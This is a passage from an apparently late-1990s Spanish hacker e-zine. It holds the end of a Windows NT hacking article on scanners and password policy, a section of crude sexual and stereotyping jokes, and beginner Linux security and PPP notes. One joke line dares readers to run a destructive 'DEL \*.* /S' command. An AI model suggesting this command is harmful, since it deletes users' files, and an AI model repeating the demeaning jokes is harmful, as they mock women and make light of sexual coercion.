difusion ha hecho que salgan versiones para windows, lo malo de estas ultimas
es que apenas disponen de plugin's y hay que currarselos uno mismo.
Ahi te va su web:
http://www.nessus.org o http://www.securiteam.com
3.7 - Essential NetTools :
--------------------------
Esta es otra de las mejores (siempre para mi gusto) herramientas de
Hack NT, el Essential es un scaner de NetBios muy bueno, lo que hace es ir
haciendo un nbtstat a un rango de IP's definido por el usuario, y muestra el
resultado de las mismas, de las que se puede sacar mucha info del sistema, el
login del usuario logueado actualmente, si el sistema tiene recursos
compartidos, ... pero bueno, de este tema se podria escribir largo y tendido
asi que desde aqui te remito al excelente articulo "Understanding NetBIOS"
por NeonSurge y que puedes pillar de www.rhino9.com
Essential viene ademas con una Shell grafica para el NAT y con mas pijadas
por el estilo, pero lo que realmente importa es el scaner de NetBios. Te lo
puedes bajar de:
http://www.tamos.com/soft
4 - Medidas de seguridad :
==========================
4.1 - Politica de passwords :
-----------------------------
Por muy poco que le interese a alguien el hack o 'simplentente' para
proteger la seguridad de su sistema, es evidente que una buena politica de
passwords puede ahorrarnos muchos problemas, es una pena ver como
muchissssimos administradores de sistemas importantes, o redes muy grandes
dejan cuentas sin clave, o utilizan ellos mismos, passwords como admin, root,
o el nombre de su maquina. Realmente es lamentable tanta ineptitud, pero
bueno, por si alguno esta leyendo esto, que sepa que su precioso NT tiene las
opciones de no permitir passwords con menos de cierto limite de caracteres
(ocho es lo recomendable), obligar a cambiar passwords cada cierto tiempo
(15 dias esta bastante bien), no permitir conexiones desde determinadas IP's
(permitir solo desde la ethernet propia es una buena solucion), y demas
detalles asi.
Desgraciadamente esto apenas se utiliza porque la gente que usa un NT
para administrar una red suele ser gente que no domina sistemas mas
complicados como unix, y el entorno gafico les cautiva, y claro, esta gente
no suele pararse a pensar que hay por ahi individuos que le pueden destrozar
su red en un momento.
4.2 - Auditar :
---------------
Y mas de lo mismo, que los administradores de un NT no suelen darle
mucha importancia a la seguridad y por lo tanto desactivan esas opciones de
auditar (loguear) que hacen que se demore tanto el encendido de la maquina.
En fin, pero aunque se auditara pues en general nunca es suficiente pues los
logs de un NT son algo ... cutres, lo recomendable es confiar en alguna otra
herramienta que monitorice a los usuarios y loguee sus actividades, que tome
en cuenta intento de accesos a lugares no autorizados del sistema, y que
envie alertas a los mails de los admins cuando detecte que se esta utilizando
alguna herramienta peligrosa en la red.
5 - Corto y cierro :
====================
Bueno, esto se acaba aqui, ya tan solo queda decir que hay por ahi
muchisima mas info acerca de los NT, solo hay que tener ganas de buscarla y
todo eso, ... pero bueno, como pista aqui te dejo un par de web's que tratan
de la seguridad de los sistemas NT:
http://www.somarsoft.com/
http://www.ntsecurity.com/
http://www.ntbugtraq.com/
http://www.ntresearch.com/
http://www.intrusion.com/
http://www.iss.net/
http://www.rhino9.com/
Y algunas news:
comp.os.ms-windows.nt.admin.misc
comp.os.ms-windows.nt.admin.networking
comp.os.ms-windows.nt.announce
Y listas de correo, como la de NTBugtraq, o las alertas de X-Force, o de
NTShop, ... el que no pilla la info es porque no quiere.
Venga, eso es todo, ya nos vemos, ...
"Imposible es el adjetivo de los imbeciles" Napoleon
------------------------------------------------------------------------
------------ Mr.Nexus ------------
----------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
####################################
ø ø
ø 7.- Chistes, cuentos y ø
ø otras burradas ø
ø ø
####################################
__________________________________________________________________ By VaRioS
Bueno no solo de informatica vive el hombre , asi es que esta seccion
se ha hecho espacio en este E-Zine ya que nos alegra la vida un rato
no ... tenemos que agradecer a nuestro amigo Charlie Gomez de Cali
por dejarnos publicar los chistes de su lista de correo "LA CARCAJADA"
siendo esta una pionera en latinoamerica ya que llega a una gran
cantidad de usuarios de diferentes paises hermanos .
Para suscribirte a la lista debes enviar un correo a :
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
con el subjet SUSCRIBIRME
Las 75 mentiras mas comunes de los Hombres ********************
Cualquier parecido con la realidad es pura casualidad.
Las 75 mentiras que ellos dicen (y que ellas se creen) "los hombres
mienten con mas frecuencia, y si usted les cree ¡las consecuencias son
devastadoras!"
Estas son las frases falsas mas comunes que ellos emplean para engañar,
presionar y manipular.
1. Te llamare
2. Te amo
3. Eres la unica
4. Nunca me senti asi con nadie
5. Esta noche tengo que quedarme hasta tarde en la oficina
6. Nunca tuve mejores relaciones sexuales
7. Tienes los ojos mas hermosos que he visto
8. No, no soy casado ni estoy comprometido
9. ¡que pena! Se me quedo la billetera
10. Creeme, no hay ningun problema
11. Estoy dispuesto a comprometerme contigo
12. Nunca bebo mas de dos tragos
13. Hace a¤os que mi esposa y yo no hacemos el amor
14. Nos casaremos tan pronto yo?
15. Estare en casa 20 minutos
16. No es que no me importes, es que tengo que pasar mas tiempo con mis hijos
17. En toda mi vida, solo me acoste con unas seis mujeres
18. Desde que rompimos, no he salido con nadie
19. Jamas podria mentirte
20. Podria estar asi toda la noche
21. Siempre uso preservativo
22. Puedo ayudarte a conseguir un excelente puesto
23. Te lo juro, no la he visto desde que terminamos
24. Tranquila, ya me hice la prueba del SIDA
25. Solo he fumado marihuana
26. Mis unicas fantasias sexuales son contigo
27. No, no me pareces gorda
28. Estoy muy cansado
29. ¿como puedes pensar que ella me interesa?
30. Nunca haria algo que te hiriera
31. Tu y yo solos? Haremos el amor por toda Europa
32. Quiero envejecer contigo
33. Nada cambiara entre nosotros por haber hecho el amor
34. Dejare a mi esposa
35. No te pareces en nada a mi madre
36. No me importa que profeses otra religión
37. No me molesta que ganes mas dinero que yo
38. Las mujeres mayores me parecen mas excitantes
39. Tengo un cargo muy importante
40. Lo que me atrae de ti es tu inteligencia
41. Repartiremos por la mitad el cuidado de los ni¤os
42. Claro que no me molesta que no hayas venido
43. Eres la unica que me entiende
44. Eres lo mejor que me ha sucedido
45. No, no salgo con nadie mas
46. Hace a¤os que no pienso en ella
47. Tu carrera es tan importante como la mia
48. Te prometo que cambiare
49. ¿cuantas veces debo decirte que no tengo una aventura?
50. Eres maravillosa, mereces a alguien mejor que yo
51. Gasto todo lo que gano en ti y en los ni¤os
52. Mi esposa y yo llegamos a un acuerdo
53. No, nunca dije eso
54. Me voy con los compa¤eros de oficina
55. Por supuesto que no me aburres
56. Me pareces tan atractiva como el dia en que te conoci
57. Nada mas alejado de mi mente que el divorcio
58. No es el sexo lo que me importa, sino estar cerca de ti
59. Calmate, no es mas que una amiga
60. Es solo una separacion temporal, para que reflexionemos
61. No fue mas que sexo? No significo nada
62. ¡claro que estoy escuchandote!
63. Tu eres la mujer con la que debi haberme casado
64. Ahora me concentrare en el trabajo por un tiempo
65. Te aseguro que yo no soy el padre
66. Esta vez, lo digo en serio
67. Siempre me ocupare de ti
68. En serio mi amor, ninguna de las esposas va a ir a esa reunion
69. No importa que ya tengas hijos, no es por eso que no quiero casarme
70. No haremos el amor, nunca te obligaria a hacer algo que no quisieras
71. Tu cabello (vestido, maquillaje) es hermoso
72. Mi jefe dice que no hay de que preocuparse
73. Si no tuviera tanto trabajo, te acompa¤aria
74. Cuando me retire, pasaremos mas tiempo juntos
75. No me masturbo
Jorge Oliver Fernandez Escobar
Coordinador de Sistemas Region Occidente
Cali - Colombia
Droga en el cielo *********************
San Pedro, muy preocupado, llama a sus discipulos a una junta de
emergencia por el alto consumo de droga en la tierra. Despues de
mucho pensar llegan a la conclusi¢n de que lo mejor para poder
enfrentar el problema es probar la droga ellos mismos y despues
tomar las medidas pertinentes.
Se decide que una comisi¢n de disc¡pulos baje al mundo y
consigan diferentes drogas. Se efectea la secreta operaci¢n y a
los dos d¡as mas empiezan a retornar los comisionados. Pedro
espera en la puerta y llega el primero:
"¨Quien es?" (pregunta Pedro) "Soy Mateo"...entonces Pedro abre
la puerta "¨y tu que traes Mateo?"... "Traigo coca¡na de
Colombia""... Muy bien hijo sigue.
Knoc, knoc... "¨Quien es?" (pregunta Pedro)"Soy Juan"...
entonces Pedro abre la puerta... "¨y que traes Juan?"... "Traigo
crack de New York"... "Muy bien hijo, sigue"
Knoc, Knoc... "Quien es?" (pregunta Pedro).."Soy Judas"...
entonces Pedro abre la puerta... "y que traes Judas?"...
...A LA D.E.A. IDIOTAS... TODOS CONTRA LA PARED
Eduardo Botero Jaramillo
Mexico D.F.
y
Wilver Galvis
Desde Cali - Colombia
Graffitis informaticos ***********************
1 La tarjeta madre acaba de dar a luz.
27 Novia embarazada: (A)bortar, (I)gnorar, (C)asar
37 mE pArPaDeA eL LeD dEl CaPs LoCk, Es GrAvE?
47 (A)bortar (r)eintentar (E)liminar usuario?
57 Aburrido? Teclea: DEL \*.* /S ... y pulsa .
6 Evite los virus. Hierva el ordenador antes de usar
77 Necesito Psiquiatra para Pentium que se cree un 386
78 6*66.001211232100 - Pentium Inside
97 Mi Sistema Operativo es multitarea: acaba con mi paciencia y mis
nervios
107 Backup no encontrado: (A)bortar (P)anico (D)iarrea
117 Hardware: Lo que golpeas. Software: La causa.
127 Quien diablos es el General Failure!!?? y que hace leyendo mi disco
duro???
137 (A)bortar (R)eintentar (N)o sabe/no contesta
147 Los READ.ME son para los cobardes. Se valiente. Ejecuta.
157 Conecto luego existo, no conecto luego insisto...
167 Ya esta! He logrado configurar el modem, ya no tengo probl~??_?
177 No hay mail que por bien no venga!
187 Cerveza not found (A)bort,(r)etry,(W)hisky?
197 mE ENCANTA CUANDO NO ME DOY CUENTA QUE HE PULSADO BLOQ MAYUS
207 Keyboard is not available - Press F1 to continue...
217 Mi DOS es virgen. Tiene intacto el Himem.sys
227 Mi 286 no tiene memoria, tan solo un vago recuerdo
237 No por mucho mega-ram carga Windows mas temprano
247 Command.com secuestrado por virus terrorista. Piden 35 MB de disco
duro
257 Quienmeharobadolabarraespaciadora?
267 Backup no encontrado: (c)ancelar (r)eintentar (S)uicidarse
277 Si no fuera por C, usaramos BASI, PASAL y OBOL!
287 User error: Replace user, hit any key to continue.
297 Error 941 - CPU not found...
307 Error 943 - El sistema esta funcionando demasiado bien, se caera
para seguir con la rutina.
317 Multitarea: leer en el banio.
327 Ley del Software: si aprenden a utilizarlo, sacan otra version.
337 C++ deberma llamarse "D"
Windows 95 y 98
17 Si quieres ver volar tu Windows 95... Tira el computador por la
ventana!!!
27 Windows 98 !..... Se buscan martires para pruebas nuevos.
347 Estoy usando Win 95 y la verdad es que me funciona perfc.. NO
CARRIER
357 Iniciando Win 95...Ya puede apagar el sistema.
367 Error de Win95- Windows 95 no puede bloquear el sistema.
377 WinErr 002: No hay error (todavia)
387 WinErr 007: Insuficiente cantidad de dinero gastada en hardware
397 WinErr 009: Solo Dios sabe lo que ha pasado.Error indocumentado, por
favor cuentanos como ha ocurrido
407 WinErr 010: Reservado para futuros errores de nuestros programadores
417 WinErr 019: Error del usuario - No es culpa nuestra. No lo es! No lo es!
427 WinErr 079: Mouse no encontrado, Pulse el boton izquierdo para
continuar
437 WinErr 069: Usuario Incompetente. Remplace al usuario de inmediato!
44 Oferta! con la compra de Windows 98 le regalamos 2 botones de RESET.
Los 7 enanitos van al vaticano *****************
Los 7 enanitos estan de viaje por Europa, y han llegado a Roma.
Piden audiencia con el Papa, ya que estan por alli y por supuesto se la
conceden,porque, claro para eso son LOS famosos siete Enanitos. Los
enanitos, encabezados por Gru¤on, entran en el sala de audiencias.
El Papa les saluda:
- Queridos hermanos, quereis preguntarme algo? Hay algo que os inquiete?
Gru¤on se adelanta:
- Disculpe Santidad, queriamos saber si en Roma hay monjas enanas.
El Papa le responde sorprendido:
- Pueeees, no, en Roma no hay monjas enanas.
Se oyen algunas risitas y murmullos entre los enanitos.
Gru¤on mira atras molesto y todos se callan. Vuelve a preguntar:
- Y en Europa no hay monjas enanas?
El Papa responde de nuevo con santa paciencia;
- No, querido hijo, que yo sepa en toda Europa no hay monjas enanas.
Ahora los enanitos se rien francamente mientras Gru¤on se va poniendo
colorado.
- Y en el mundo? En todo el mundo no hay monjas enanas?
- No, querido hijo, seguro que en todo el mundo no hay monjas enanas.
Los enanitos se rien a carcajadas, saltan, se abalanzan los unos sobre los
otros
en montones mientras cantan:
"Gru¤on se cojio a un pinguino /
Gru¤on se cojio a un pinguino /
Gru¤on se cojio a un pinguino ..."
Colaboracion de Jorge N. Antola
y Ruben Castro
Desde Argentina
Osos y Frank *****************************
Frank estaba excitado con su nuevo rifle, asi que se fue a cazar osos.
El avisto un pequeqo oso de color marron y le disparo. Fue entonces que
sintio un golpecito sobre su hombro y se dio vuelta para ver un granoso
negro. El oso negro le dijo
-"Tienes dos opciones. O te golpeo hasta la muerte o nosotros tenemos
sexo"
( porque los osos de ahora vienen cada vez mas degenerados ).
Frank decidio agacharse...
Aunque el se sintio dolido por 2 semanas, rapidamente se recupero y juro
venganza. Inicio otro viaje, encontro al oso negro y le disparo.
Entonces sintio otro golpecito en el hombro. Esta vez un enorme oso
grisaceo a su derecha que le dijo:
- "Es un enorme misterio Frank.Tienes dos opciones. O te golpeo hasta la
muerte o nosotros tenemos sexo".
Otra vez, Frank penso que era mejor cumplir.
Aunque sobrevivio, pasaron muchos meses hasta que se recupero.
Ultrajado, el se dirigio de nuevo al bosque, logrando encontrar la pista
del oso grisaceo, lo ubico y le disparo. El sintio una dulce venganza,
fue entonces que sintio un golpecito en el hombro, giro y vio un
gigantesco oso polar mirandolo fijo, que le dijo:
- "Admitelo Frank, tu no vienes aqui a cazar ? no ?".
Colaboracion de Boris Ramirez
Desde Cali - Colombia
La querida esposa **************************
Humberto y Mariela estaban proximos a celebrar sus Bodas de
Plata`matrimoniales. Una tranquila noche de viernes, cuando estaban
proximos a apagar la luz e irse a dormir, Humberto con voz muy suave y
tono algo timido solto la pregunta como un canonazo:
* "Gordita, tu alguna vez me has sido infiel en estos a¤os?"
* "Ay... bobito, tu si preguntas unas cosas, como se te ocurre? Claro que no."
* "Seguro... gordita, nunca, nunca?"
* "Y ahora que fue lo que se te metio en la cabeza? Te digo que nunca...cielito!"
* "Pero no te molestes, gordita... es solo que hay dias en que esas ideas
aparecen... no es que a estas alturas me moleste, pero es que las dudas me
matan".
Mariela permanecio un rato en silencio, abrazo a Humberto y acercando su
cara a la mejilla le susurro:
* "Mira mi cielo... si de verdad no te molesta y te hace estar mas
tranquilo... si, en estos 25 anos te fui infiel 3 veces...".
Humberto alcanzo a tener un primer impulso de reaccionar pero se
tranquilizo, espiro profundo y con voz pausada le dijo a su mujer:
* "Tres veces? Y eso? Ahora no me vayas a dejar lleno de dudas
gordita".
* "Cielito, y para que le das mas vueltas... fue hace tanto tiempo."
* "No, cuentame... te juro que es mejor, gordita".
* "Bueno. Recuerdas hace como veinte anos cuando querias comprar la casa
y en el Banco no te querian hacer ningun prestamo? Recuerdas que un dia el
Gerente en persona vino, trajo los papeles, te dio un plazo mas amplio y
con menores intereses?".
* "De verdad hiciste ese sacrificio para que yo lograra mi sueno?"
Ella movio la cabeza timidamente y lo miro con cautela.
* "Gordita... tu si eres la mujer mas maravillosa del mundo... pero
cuentame y la segunda?"
* "Ay cielito, no seas mugre... para que quieres saber mas? Dejalo asi".
* "Por favor gordita dime... cuentame".
* "Recuerdas cuando te dio el infarto triple...recuerdas que no teniamos
como pagar la cirugia? Recuerdas que sorpresivamente el Doctor Haldemann se
ofrecio espontaneamente a hacer la operacion, viajo desde Houston y luego
nunca cobro la cuenta?".
Humberto la abrazo, la beso y con voz entrecortada le dijo:
* "Mi amor, mi gordita... de verdad tu llegaste hasta esos extremos por
amor por mi? Definitivamente tu eres la mejor esposa del mundo, no, de la
galaxia".
Mariela sonrio y dejo escapar un suspiro de alivio.
* "Pero cuentame gordita... y la tercera?".
* "Ayyy Humberto no mas!".
* "Por favor gordita no me dejes con esa espinita, cuentame".
* "Recuerdas... cuando resolviste que querias ser presidente del club de
golf.... recuerdas que te hacia falta los votos de otros 32 socios...
recuerdas que sorpresivamente barriste en la eleccion...".
Estaba la novia de cumplea¤os. *******************
El novio, que es un caballero, le dice que le ha preparado una cena, y
que desea que ella vaya al apartamento de el para que cenen juntos.
Llego la noche y la novia se va para donde el novio. Las luces estaban
tenues. El novio la recibe, se dan un beso y le dice que se siente:
"Esperame aqui mi amor, voy por el mantel."
Cuando el novio se va, la novia dice: "Menos mal que se fue para la
cocina, esos frijoles del almuerzo me cayeron mal y casi se me sale un
pedo. Ahora me lo tiro tranquila .... prrrrrrrrrrr ..... uff! estoy
podrida ..." Y con un cojin empezo a ventilar para disimular el olor.
Llega el novio, acomoda el mantel y le dice: "Ya vengo mi amor, voy por
unas velas ..."
Cuando el se va, la novia dice: "Malditos frijoles, y casi se me sale
otra vez.... me tiro otrico rapidito .... prrrrrrrrr ... rrrrr
.rrr.... rr ..... r ... Uff! estoy podrida ...". Y ventila el olor con
un cojin.
Llega el novio con las velas, las coloca y le dice: "Esperame te traigo
una torta que te prepare yo mismo ..." y la novia nuevamente, despues
que se va el novio: "Que desepero con esta piorrea ... aqui va otro ...
prrrrrrrrrrrrrrr ...... rrrrrrrrrrrr ..... rrrrrrrrrr ... rrrr ... rrr
........ r .............. r ..... uff! estoy pero podrida .." y ventila
otra vez el olor con un cojin ...
Depronto el novio llega con la torta, prende la luz y salen todos los
amigos con la mano en la nariz, gritando. "Sorpresa !!!!!"
Nelson Ricardo Gomez.
Cali - Colombia
EL CAGON *********************
En una fiesta bastante concurrida, se encontraba un tipo con unas ganas
de cagar las tremendas. Busco y busco el ba¤o en el primer piso, pero no
lo encontro, decidio entonces subir al segundo piso, lugar en donde
tampoco hallo el anhelado ba¤o. Lo unico que encontro en el segundo
nivel fue un peque¤o agujero en la mitad de un salon. Aprovechando que
la multitud se encontraba en el primer piso, decidio cagar en el
consabido agujero.
Una vez realizado su cometido, bajo las escaleras con una gran cara de
satisfaccion, mas no encontro a nadie en el primer piso, unicamente a un
tipo en el fondo del salon.
Sorprendido el cagon le pregunto al solitario de esta forma:
Oye pecoso, adonde se ha ido la gente, y el solitario tipo le contesta:
Vea Malparido, en primer lugar no soy pecoso y en segundo lugar todo el
mundo esta buscando al hijueputa que se cago en el ventilador.
Colaboracion de Jorge Marmolejo
desde Cali - Colombia
una mujer se queja ante el medico porque hace dias que su marido no le
hace nada.
el medico le responde que justo en ese momento estan probando unas gotas
para devolver las ganas, que las pruebe con su marido y regrese a
contarle.
Al dia siguiente la mujer vuelve a donde el medico y traia una cara que
no se sabia si era de
alegria o de desconsuelo.
La conversacion fue la siguiente:
Doctor- que hubo se¤ora como le fue?
Se¤ora- Pues no se doctor dejeme le cuento:
Estabamos cenando con mi marido y en el momento en que el se levanto de
la mesa yo le eche las
gotas en el jugo, cuando regreso se tomo un solo sorbo del jugo y
exactamente a los
cinco minutos se levanto de la mesa, voto todo al suelo, me puso sobre
la mesa y....
Doctor- Pero entonces que pasa, no era eso lo que usted queria?
Se¤ora- Si, pero no en restaurante.
Colaboracion de Jorge Vargas
Desde Cali - Colombia
Carta de un informatico dejando a su novia **********************
Es en estos momentos en los que mi vida experimenta terribles fluctuaciones de red, cuando me veo en la obligacion de
decirte adios y desinstalarte de mi sistema.
Me cuesta mucho, creeme, pues para borrarte de mi disco duro necesitare mucho mas que un par de formateos a bajo
nivel. Desde el primer dia en que te vi, ya tu version trial dejo huella en mi de lo que adivine como una arquitectura interna
realmente interesante y tierna. ¿Y por que lo voy a negar? la belleza de tu interface me dijo desde el primer momento que
no encontraria una aplicacion como tu, con un dise¤o externo tan bello y con ese par de ... iconos que luces y sobre los
que tanto me gusta hacer "click".
Pero de un tiempo a esta parte te habras dado cuenta de que nuestra interactividad no es lo que era, en todos los
aspectos. Hay que admitirlo: usamos diferentes protocolos. Y, en fin, hay parejas que arreglan muchas de esas diferencias
mediante la comparticion de hardware, pero tu por las noches te convertiste en un sistmea cerrado que no aceptaba mi
login y no pude soportarlo mas. ¡Soy un hombre! nuestra vida en comun tenia como punto basico el que me aseguraste
ser multitarea: yo traeria el dinero y tu cuidarias nuestras
homepages, harias la comida y llevarias a cabo la gestion de los recursos del sistema. Esa condicion, bonita, era de
solo-lectura. Como he podido comprobar, no eres mejor que cualquier beta en ese sentido y no cumples lo que prometes.
¡Yo no soy ninguna demo y pido lo mismo a cambio! ¡Y yo nunca me he quedado colgado a la hora de ir a pagar al host el
dinero del alquiler! Si no estabas de acuerdo con los terminos de la licencia, no deberias haber hecho click en NEXT**
Me siento pirateado y crackeado y quiero formatear e instalar desde cero. No niego que hayamos tenido buenas sesiones
(con o sin red) pero lo nuestro se acabo. Tal vez algun dia, si me presentas una version muy mejorada, podamos volver a
intentarlo. Pero hasta entonces, trabajare otros formatos hasta dar con aquel que llene mi core interno, Se que con tu
interface no te costara mucho encontrar a un usuario que compre tus derechos. Espero que no te resulte dificil la
actualizacion, y que comprendas la razon de nuestra incompatibilidad.
Alcides de Maria
desde Mendoza - Argentina
MIERDA ******************
cuando digan o piensen en la palabra mierda, por favor sean
explicitos, ya que con la gran cantidad de acepciones que
tiene esta palabra se podrian estar refiriendo a:
a.. Distancia muy larga: "Queda en la mierda"
b.. Ampliacion del lugar: "Me fui hasta la mierda"
c.. Valor dietetico: "Coma mierda!"
d.. Adjetivo calificativo: "Sos una mierda"
e.. Educacion Formativa: "Dejate de mierdas"
f.. Egocentrismo: "Se cree la gran mierda"
g.. Escepticismo: "No le crea ni mierda"
h.. lncultura: "No sabe ni mierda"
i.. Venganza: "Volvamoslo mierda"
j.. Accidente: "Se volvio mierda"
k.. Efecto visual: "No se ve ni mierda"
l.. Sentido del olfato: "Huele a mierda"
m.. Como despedida: "Andate pa' la mierda"
n.. Metamorfosis: "Me volvi mierda"
¤.. Holgazaneria: "No hace ni mierda"
o.. Curiosidad: "Que sera esa mierda?"
p.. Escasez: "No hay ni mierda"
q.. Superlativo: "Purisima mierda"
r.. Velocidad: "Va a toda mierda"
s.. Tacaneria: "No me regalo ni mierda"
t.. Habitos alimenticios: "Es un come mierda"
u.. Escandalo: "Volo mierda al techo"
v.. Falsa sabiduria: "Sabe tanto que sabe a mierda"
w.. lndigestion: "Que mierda de comida"
x.. Conformismo: "Sigo comiendo mierda"
y.. Explosion: "Volo a la mierda"
z.. Limite de la paciencia: "Me vas a sacar la mierda..."
Colaboracion de Luis Fernando Velazco
Desde Bogota - Colombia
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
################################
ø ø
ø 8.- Linux Por todos ø
ø y para todos ø
ø ø
################################
__________________________________________________________________ By Varios
Mucha gente se ha dado cuenta de las ventajas que trae consigo tener un
sistema estable en su equipo, y han decidido cambiarse definitivamente a
Linux, ya sea por Moda, necesidad, curiosidad, ganas de aprender, o
simplemente por que si, si tu no lo has hecho por alguna razon, pues aqui
te traemos una pequena recopilacion de articulos interesantes acerca de
Linux.
Es linux para ti
----------------
by moonspell
1- es linux para ti si te consideras un computin de corazon
a mi manera no existe mejor manera de utilizar el potencial de tu
computador si instalas linux, linux es un sistema operativo flexible y
poderoso con montones de utilidades y programas para quienes aman
ensusiarse las manos Aprenderás mucho sobre tu computadora sólo con
instalar Linux. Te volverás un experto si lo utilizas por unos tres o
más meses.
2- Linux es para ti se te encanta ver como funcionan las cosas
Tal como acabo de mencionar, Linux viene con código fuente, y por
montones. Los distribuidores de Linux deben, por ley, poner a la
disposición el código fuente completo de todas las utilidades que
ellos no escribieron (por ejemplo: aquellas bajo GPL-Licencia Pública
General). Así que puedes modificarlo, recompilarlo, optimizarlo,
romperlo, arreglarlo, o lo que sea!
Nota: Esto no significa que debes conocer C, o saber como programar en
absoluto para USAR Linux. Un mito común sobre Linux es que tendrás que
escribir tu propios controladores (drivers) de dispositivos. Nada
puede estar tan lejos de la verdad. Los drivers están públicamente
disponibles justo para casi CUALQUIER hardware que puedas imaginar. Ni
siquiera tienes que MIRAR el código, si no lo deseas. De hecho, menos
de 2 meses después de que la tarjeta de video Diamond Nvidia Riva 128
AGP (Accelerated Graphics Port) fue lanzada al mercado, yo pude
encrontrar un servidor X estable, GRATUITO, que la soportaba
completamente bien sin modificaciones.
3- Linux es para ti si deseas tener un sistema estable (por primera vez)
El record actual Linux uptime es de 497 días (y el sistema no se
estrelló, tuvo que ser movido). Eso es un completo cambio respecto a
los 3 *remote crash exploits* de Win95/NT que fue descubierto en un
periodo de una semana :) Por supuesto, no clamo que Linux no tiene
bugs (fallos). Pero en cuanto un bug es hallado, un parche está
disponible en pocas horas.
Un día después del descubrimiento del *crash bug* en el Pentium MMX,
Linux fue el segundo sistema en publicar un parche, solo 10 horas
detras de BSDi (BSDi tuvo ayuda de Intel). El bug teardrop que afectó;
máquinas Windows también estaba presente en Linux, pero un parche
no-oficial fue lanzado en cuestión de horas, y uno oficial fue lanzado
en 5 días. Microsoft publicó parches oficiales para este *exploit*
aparatosamente dos meses después de ser descubierto. Como un mes
después se descubrió que todo lo que tenías que hacer para pasar por
alto su "parche" era incrementar la longitud del paquete del ataque.
Aún están pendientes nuevos parches por parte de Microsoft (al menos
para cuando se escribió este documento - 21 de Enero, 1998). ¿Cómo es
Linux reparado tan rápido? Sigue leyendo, amigo, sigue leyendo. :)
4- Linux es para ti si gran parte del uso de tu computadora es para
tareas relativas a Internet.
Linux fue construido en la Internet, para la Internet, lo cual
significa que justo desde el principio tuvo capacidades de red. Por
este motivo, puedes esperar un soporte de redes muy rápido, eficiente
y estable. También, ya que es un "clon" de UNIX (ni siquiera éstos son
argumentos válidos...) tiene TODOS los demonios y programas necesarios
para comunicaciones entre cliente y servidor. Linux viene con httpd,
ftpd, telnetd, POP3d, ASI y muchos más servicios. También viene con
todos los clientes necesarios para usar estos servicios en otras
máquinas.
5- Linux es para ti si deseas poder "CONFIAR" en tu computador
Si deseas poder confiar en tu sistema operativo, Linux es para ti.
Gracias a todas las utilidades de monitoreo que vienen con un UNIX, y
por lo tanto Linux, puedes saber exactamente lo que está sucediendo
cuando y donde en tu máquina, y ya que TODO el código fuente del
sistema base de Linux DEBE ser hecho público, es IMPOSIBLE aún para
aplicaciones comerciales, stand-alone, código-secreto, hacer cosas
misteriosas (Como, oh, no se, digamos reportar el contenido de tu
disco duro, prestando particular atención a componentes
no-registrados, a alguna agencia central :) sin que sepas exactamente
lo que está pasando. También, ya que los sistemas UNIX (luego Linux)
son multi-usuario y operan en full modo protegido, mientras los
programas no sean ejecutados como root (el ser supremo de UNIX :), su
habilidad para hacer daño estará limitada en extremo. Esto significa
que no hay virus, ni del /s c:\*.*, ni format c:, ni bizarros
controles ActiveX que manipulen o destruyan tu máquina, o ninguna de
esa basura. Eso también significa que aquellos programas seriamente
chequeados por fsck no pueden colgarte el sistema entero. Ellos
simplemente se estrellan de manera silenciosa, y el Kernel no les
dedica un segundo pensamiento. Aún si tu entorno X se enbasura (sólo
sucede en circunstancias EXTREMAS, cuando programas de confianza hacen
malas cosas), puedes aún hacer un blind reboot, o cambiar de terminal
y arreglar el problema.
6- Linux es para ti si estas cansado de tragarte toda la basura que
MICROSOFT te obliga a tragar
Esto debería hablar por sí mismo. Si VERDADERAMENTE crees que los
productos Microsoft son excelentes; si HONESTAMENTE no te sientes
limitado por una GUI (Graphic User Interface = Interfaz Gráfica de
Usuario); si tú NUNCA has visto un producto Microsoft estrellarse; si
tú PUEDES hacer que una estación NT trabaje continuamente sin
estrellarse (o reiniciarse) por encima de 6 meses, entonces yo admito,
Linux puede no ser para ti. Como una nota interesante: MS anunció
recientemente que Windows NT 5 (beta) contiene 27 MILLONES de líneas
de código. Linux/XF86 parecen hacer justo un fino trabajo en sólo 2.5
millones de líneas. Me dá pesadillas el sólo pensar sobre todos los
bugs (errores) que deben haber en esos 27 millones de líneas, ni
mencionar cuan LENTO debe correr. Como nota aparte, MS ha diferido el
lanzamiento de NT 5 hasta 1.999 (ahora llamado Windows 2000).
Sorpresa, sorpresa :)
Bueno con este texto lo unico que pretendo es que de una vez por todas
chile sea participe de el gran linux ya que por lo que se ahun un 85%
de las plataformas en chile son de de aquel sistema que no se quiero
nombrar por que me dan ganas de llorar
Pequeña guía de seguridad para el linux de tu hogar.-|
------------------------------------------------------
By AndyK
He escrito esto porque la mayoría de las veces cuando instalas linux
este keda con mucho servicios activos, y si recien comienzas en el mundo
de linux es conveniente ke tomes algunas pequeñas precauciones....
Una de las formas más fáciles para asegurarte de ke no tengas visitas
extrañas es poniendo esto en el archivo /etc/hosts.deny
all:all
Con esto le dices a los servicios locales de INET ke no acepten peticiones
de ningun host.
O sea si alguien intenta por ejemplo conectarse por telnet a tu equipo
la respuesta sería "Connection closed by foreign Host".
Otro mas !!
Conexiones PPP con Linux
------------------------
By AndyK
Debido a las constantes preguntas sobre como conectarse a Internet con tu linux
he decidido escribir esta mini ayuda.... Esta vez explicare la forma de
conectarse a través del modo PPP.
Primero ke nada necesitas tener tu kernel con soporte para PPP.
si recibes un mensaje diciendote ke tu sistema carece de soporte para PPP
deberas recompilarlo. (mayor información en los HOW-TOs ).
En el caso de ke tu sistema ya lo tenga deberas configurar tu equipo ejecutan
do 'netconfig'. Ahí le asignas el nobre a tu equipo, su dirección ip (0.0.0.0
si es dinámica, en la mayoría de los casos lo es), la máscara de red
(255.255.255.0 para redes del tipo C) y el DNS.
Luego en el directorio /etc/ppp deberás crear un archivo de nombre 'options':
/etc/ppp/options
#aki comienza
/dev/cua0 #cua0= com1 cua1=com2, etc... el puerto com en el ke está tu modem
115200 # la velocidad máxima de transmisión...
